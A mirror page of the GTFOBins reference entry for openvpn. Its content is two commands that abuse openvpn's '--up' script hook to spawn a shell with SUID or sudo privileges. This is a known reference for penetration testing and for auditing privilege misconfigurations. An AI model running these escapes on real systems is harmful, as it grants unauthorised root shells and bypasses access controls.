This website requires JavaScript.
Explore
Help
Register
Sign In
mirror
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced
2026-01-18 05:21:35 +01:00
Code
Issues
ad35aaa5d8
GTFOBins.github.io
/
_gtfobins
/
openvpn.md
Emanuel Duss
ad35aaa5d8
Add openvpn
2021-02-20 00:33:43 +01:00
235 B
Raw
Blame
History
functions
suid
sudo
code
./openvpn --dev tun0 --script-security 2 --up '/bin/sh -p -c "sh -p"'
code
COMMAND='id' sudo openvpn --dev tun0 --script-security 2 --up '/bin/sh -c sh'